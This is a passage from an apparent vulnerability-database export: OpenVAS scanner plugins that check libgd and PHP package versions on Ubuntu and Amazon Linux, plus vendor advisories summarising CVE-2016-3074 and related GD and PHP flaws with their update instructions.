value:\"It was discovered that the GD library\n incorrectly handled certain color tables in XPM images. If a user or automated\n system were tricked into processing a specially crafted XPM image, an attacker\n could cause a denial of service. This issue only affected Ubuntu 12.04 LTS and\n Ubuntu 14.04 LTS. (CVE-2014-2497)\n\n It was discovered that the GD library incorrectly handled certain malformed\n GIF images. If a user or automated system were tricked into processing a\n specially crafted GIF image, an attacker could cause a denial of service.\n This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.\n (CVE-2014-9709)\n\n It was discovered that the GD library incorrectly handled memory when using\n gdImageFillToBorder(). A remote attacker could possibly use this issue to\n cause a denial of service. (CVE-2015-8874)\n\n It was discovered that the GD library incorrectly handled memory when using\n gdImageScaleTwoPass(). A remote attacker could possibly use this issue to\n cause a denial of service. This issue only applied to Ubuntu 14.04 LTS,\n Ubuntu 15.10 and Ubuntu 16.04 LTS. (CVE-2015-8877)\n\n Hans Jerry Illikainen discovered that the GD library incorrectly handled\n certain malformed GD images. If a user or automated system were tricked\n into processing a specially crafted GD image, an attacker could cause a\n denial of service or possibly execute arbitrary code. (CVE-2016-3074)\");\n script_tag(name:\"affected\", value:\"libgd2 on Ubuntu 16.04 LTS,\n Ubuntu 15.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2987-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2987-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS|15\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libgd3:i386\", ver:\"2.1.0-3ubuntu0.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgd3:amd64\", ver:\"2.1.0-3ubuntu0.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libgd2-noxpm:amd64\", ver:\"2.0.36~rc1~dfsg-6ubuntu2.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgd2-noxpm:i386\", ver:\"2.0.36~rc1~dfsg-6ubuntu2.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgd2-xpm:i386\", ver:\"2.0.36~rc1~dfsg-6ubuntu2.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgd2-xpm:amd64\", ver:\"2.0.36~rc1~dfsg-6ubuntu2.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libgd3:i386\", ver:\"2.1.1-4ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgd3:amd64\", ver:\"2.1.1-4ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libgd3:amd64\", ver:\"2.1.1-4ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgd3:i386\", ver:\"2.1.1-4ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T22:56:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8865", "CVE-2016-4070", "CVE-2016-3074", "CVE-2016-4073", "CVE-2016-4072", "CVE-2016-4071"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-05-09T00:00:00", "id": "OPENVAS:1361412562310120687", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120687", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-698)", "sourceData": "# Copyright (C) 2016 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120687\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-05-09 14:12:03 +0300 (Mon, 09 May 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-698)\");\n script_tag(name:\"insight\", value:\"The following security-related issues were resolved:Buffer over-write in finfo_open with malformed magic file (CVE-2015-8865 )Signedness vulnerability causing heap overflow in libgd (CVE-2016-3074 )Integer overflow in php_raw_url_encode (CVE-2016-4070 )Format string vulnerability in php_snmp_error() (CVE-2016-4071 )Invalid memory write in phar on filename containing \\\\0 inside name (CVE-2016-4072 )Negative size parameter in memcpy (CVE-2016-4073 )\");\n script_tag(name:\"solution\", value:\"Run yum update php56 to update your system.\n\n Run yum update php55 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-698.html\");\n script_cve_id(\"CVE-2015-8865\", \"CVE-2016-4073\", \"CVE-2016-4072\", \"CVE-2016-4071\", \"CVE-2016-4070\", \"CVE-2016-3074\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"php55-mbstring\", rpm:\"php55-mbstring~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-intl\", rpm:\"php55-intl~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-tidy\", rpm:\"php55-tidy~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-pdo\", rpm:\"php55-pdo~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-enchant\", rpm:\"php55-enchant~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mcrypt\", rpm:\"php55-mcrypt~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-xmlrpc\", rpm:\"php55-xmlrpc~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-pspell\", rpm:\"php55-pspell~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-snmp\", rpm:\"php55-snmp~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-debuginfo\", rpm:\"php55-debuginfo~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-xml\", rpm:\"php55-xml~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-embedded\", rpm:\"php55-embedded~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-gd\", rpm:\"php55-gd~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55\", rpm:\"php55~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-gmp\", rpm:\"php55-gmp~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-recode\", rpm:\"php55-recode~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-cli\", rpm:\"php55-cli~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-devel\", rpm:\"php55-devel~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-common\", rpm:\"php55-common~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mssql\", rpm:\"php55-mssql~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-dba\", rpm:\"php55-dba~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-bcmath\", rpm:\"php55-bcmath~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-pgsql\", rpm:\"php55-pgsql~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-fpm\", rpm:\"php55-fpm~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-opcache\", rpm:\"php55-opcache~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-imap\", rpm:\"php55-imap~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mysqlnd\", rpm:\"php55-mysqlnd~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-odbc\", rpm:\"php55-odbc~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-process\", rpm:\"php55-process~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-soap\", rpm:\"php55-soap~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-ldap\", rpm:\"php55-ldap~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-cli\", rpm:\"php56-cli~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-embedded\", rpm:\"php56-embedded~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-ldap\", rpm:\"php56-ldap~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-common\", rpm:\"php56-common~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-intl\", rpm:\"php56-intl~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mcrypt\", rpm:\"php56-mcrypt~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mysqlnd\", rpm:\"php56-mysqlnd~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-xml\", rpm:\"php56-xml~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-debuginfo\", rpm:\"php56-debuginfo~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-pgsql\", rpm:\"php56-pgsql~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-fpm\", rpm:\"php56-fpm~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-bcmath\", rpm:\"php56-bcmath~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-xmlrpc\", rpm:\"php56-xmlrpc~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-dba\", rpm:\"php56-dba~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-devel\", rpm:\"php56-devel~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-pdo\", rpm:\"php56-pdo~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-snmp\", rpm:\"php56-snmp~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-opcache\", rpm:\"php56-opcache~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mssql\", rpm:\"php56-mssql~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-recode\", rpm:\"php56-recode~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-odbc\", rpm:\"php56-odbc~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-gmp\", rpm:\"php56-gmp~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-gd\", rpm:\"php56-gd~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-pspell\", rpm:\"php56-pspell~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56\", rpm:\"php56~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-soap\", rpm:\"php56-soap~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mbstring\", rpm:\"php56-mbstring~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-process\", rpm:\"php56-process~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-tidy\", rpm:\"php56-tidy~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-imap\", rpm:\"php56-imap~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-dbg\", rpm:\"php56-dbg~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-enchant\", rpm:\"php56-enchant~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:39", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3074"], "description": "A heap-based buffer overflow caused by an integer signedness error has\nbeen found in the libgd code handling compressed gd2 chunks.", "modified": "2016-05-06T00:00:00", "published": "2016-05-06T00:00:00", "id": "ASA-201605-8", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-May/000615.html", "type": "archlinux", "title": "gd: arbitrary code execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:50", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9709", "CVE-2016-3074", "CVE-2014-2497"], "edition": 1, "description": "### Background\n\nGD is a graphic library for fast image creation.\n\n### Description\n\nMultiple vulnerabilities have been discovered in GD. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll GD users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/gd-2.2.2\"", "modified": "2016-07-16T00:00:00", "published": "2016-07-16T00:00:00", "id": "GLSA-201607-04", "href": "https://security.gentoo.org/glsa/201607-04", "type": "gentoo", "title": "GD: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-01T00:54:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7414", "CVE-2016-5385", "CVE-2016-6290", "CVE-2016-7127", "CVE-2016-7133", "CVE-2016-4540", "CVE-2016-4538", "CVE-2016-7131", "CVE-2016-4544", "CVE-2016-7125", "CVE-2015-8865", "CVE-2016-7134", "CVE-2016-7130", "CVE-2016-4543", "CVE-2016-4542", "CVE-2016-7129", "CVE-2016-4541", "CVE-2016-7413", "CVE-2016-7126", "CVE-2016-6295", "CVE-2016-6297", "CVE-2016-6292", "CVE-2016-7416", "CVE-2016-6289", "CVE-2016-7411", "CVE-2016-4539", "CVE-2016-3074", "CVE-2016-7124", "CVE-2016-4073", "CVE-2016-7417", "CVE-2016-6294", "CVE-2016-7128", "CVE-2016-7418", "CVE-2016-7132", "CVE-2016-4072", "CVE-2016-6291", "CVE-2016-4071", "CVE-2016-6296", "CVE-2016-4537", "CVE-2016-7412"], "edition": 1, "description": "### Background\n\nPHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. \n\n### Description\n\nMultiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn attacker can possibly execute arbitrary code or create a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll PHP users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev=lang/php-5.6.28\"", "modified": "2016-11-30T00:00:00", "published": "2016-11-30T00:00:00", "href": "https://security.gentoo.org/glsa/201611-22", "id": "GLSA-201611-22", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:02", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9709", "CVE-2015-8877", "CVE-2015-8874", "CVE-2016-3074", "CVE-2014-2497"], "description": "It was discovered that the GD library incorrectly handled certain color \ntables in XPM images. If a user or automated system were tricked into \nprocessing a specially crafted XPM image, an attacker could cause a denial \nof service. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. \n(CVE-2014-2497)\n\nIt was discovered that the GD library incorrectly handled certain malformed \nGIF images. If a user or automated system were tricked into processing a \nspecially crafted GIF image, an attacker could cause a denial of service. \nThis issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. \n(CVE-2014-9709)\n\nIt was discovered that the GD library incorrectly handled memory when using \ngdImageFillToBorder(). A remote attacker could possibly use this issue to \ncause a denial of service. (CVE-2015-8874)\n\nIt was discovered that the GD library incorrectly handled memory when using \ngdImageScaleTwoPass(). A remote attacker could possibly use this issue to \ncause a denial of service. This issue only applied to Ubuntu 14.04 LTS, \nUbuntu 15.10 and Ubuntu 16.04 LTS. (CVE-2015-8877)\n\nHans Jerry Illikainen discovered that the GD library incorrectly handled \ncertain malformed GD images. If a user or automated system were tricked \ninto processing a specially crafted GD image, an attacker could cause a \ndenial of service or possibly execute arbitrary code. (CVE-2016-3074)", "edition": 5, "modified": "2016-05-31T00:00:00", "published": "2016-05-31T00:00:00", "id": "USN-2987-1", "href": "https://ubuntu.com/security/notices/USN-2987-1", "title": "GD library vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:42", "bulletinFamily": "software", "cvelist": ["CVE-2014-9709", "CVE-2015-8877", "CVE-2015-8874", "CVE-2016-3074", "CVE-2014-2497"], "description": "USN-2987-1 GD library vulnerabilities\n\n# \n\nMedium\n\n# Vendor\n\nlibgd2, Canonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04 LTS \n\n# Description\n\nIt was discovered that the GD library incorrectly handled certain color tables in XPM images. If a user or automated system were tricked into processing a specially crafted XPM image, an attacker could cause a denial of service. ([CVE-2014-2497](<http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-2497.html>))\n\nIt was discovered that the GD library incorrectly handled certain malformed GIF images. If a user or automated system were tricked into processing a specially crafted GIF image, an attacker could cause a denial of service. ([CVE-2014-9709](<http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-9709.html>))\n\nIt was discovered that the GD library incorrectly handled memory when using gdImageFillToBorder(). A remote attacker could possibly use this issue to cause a denial of service. ([CVE-2015-8874](<http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8874.html>))\n\nIt was discovered that the GD library incorrectly handled memory when using gdImageScaleTwoPass(). A remote attacker could possibly use this issue to cause a denial of service. ([CVE-2015-8877](<http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8877.html>))\n\nHans Jerry Illikainen discovered that the GD library incorrectly handled certain malformed GD images. If a user or automated system were tricked into processing a specially crafted GD image, an attacker could cause a denial of service or possibly execute arbitrary code. ([CVE-2016-3074](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3074.html>))\n\n# Affected Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * All versions of Cloud Foundry cflinuxfs2 prior to v.1.64.0 \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 v.1.64.0 or later versions \n\n# Credit\n\nHans Jerry Illikainen\n\n# References\n\n * <http://www.ubuntu.com/usn/usn-2987-1/>\n * <http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-2497.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-9709.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8874.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8877.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3074.html>\n", "edition": 5, "modified": "2016-06-13T00:00:00", "published": "2016-06-13T00:00:00", "id": "CFOUNDRY:29A67C6EFF8B00905B423AF785FD3E4C", "href": "https://www.cloudfoundry.org/blog/usn-2987-1/", "title": "USN-2987-1 GD library vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:35:01", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8865", "CVE-2016-4070", "CVE-2016-3074", "CVE-2016-4073", "CVE-2016-4072", "CVE-2016-4071"], "description": "**Issue Overview:**\n\nThe following security-related issues were resolved:\n\nBuffer over-write in finfo_open with malformed magic file ([CVE-2015-8865 __](<https://access.redhat.com/security/cve/CVE-2015-8865>)) \nSignedness vulnerability causing heap overflow in libgd ([CVE-2016-3074 __](<https://access.redhat.com/security/cve/CVE-2016-3074>)) \nInteger overflow in php_raw_url_encode ([CVE-2016-4070 __](<https://access.redhat.com/security/cve/CVE-2016-4070>)) \nFormat string vulnerability in php_snmp_error() ([CVE-2016-4071 __](<https://access.redhat.com/security/cve/CVE-2016-4071>)) \nInvalid memory write in phar on filename containing \\\\\\0 inside name ([CVE-2016-4072 __](<https://access.redhat.com/security/cve/CVE-2016-4072>)) \nNegative size parameter in memcpy ([CVE-2016-4073 __](<https://access.redhat.com/security/cve/CVE-2016-4073>))\n\n \n**Affected Packages:** \n\n\nphp56, php55\n\n \n**Issue Correction:** \nRun _yum update php56_ to update your system. \nRun _yum update php55_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n php55-mbstring-5.5.35-1.114.amzn1.i686 \n php55-intl-5.5.35-1.114.amzn1.i686 \n php55-tidy-5.5.35-1.114.amzn1.i686 \n php55-pdo-5.5.35-1.114.amzn1.i686 \n php55-enchant-5.5.35-1.114.amzn1.i686 \n php55-mcrypt-5.5.35-1.114.amzn1.i686 \n php55-xmlrpc-5.5.35-1.114.amzn1.i686 \n php55-pspell-5.5.35-1.114.amzn1.i686 \n php55-snmp-5.5.35-1.114.amzn1.i686 \n php55-debuginfo-5.5.35-1.114.amzn1.i686 \n php55-xml-5.5.35-1.114.amzn1.i686 \n php55-embedded-5.5.35-1.114.amzn1.i686 \n php55-gd-5.5.35-1.114.amzn1.i686 \n php55-5.5.35-1.114.amzn1.i686 \n php55-gmp-5.5.35-1.114.amzn1.i686 \n php55-recode-5.5.35-1.114.amzn1.i686 \n php55-cli-5.5.35-1.114.amzn1.i686 \n php55-devel-5.5.35-1.114.amzn1.i686 \n php55-common-5.5.35-1.114.amzn1.i686 \n php55-mssql-5.5.35-1.114.amzn1.i686 \n php55-dba-5.5.35-1.114.amzn1.i686 \n php55-bcmath-5.5.35-1.114.amzn1.i686 \n php55-pgsql-5.5.35-1.114.amzn1.i686 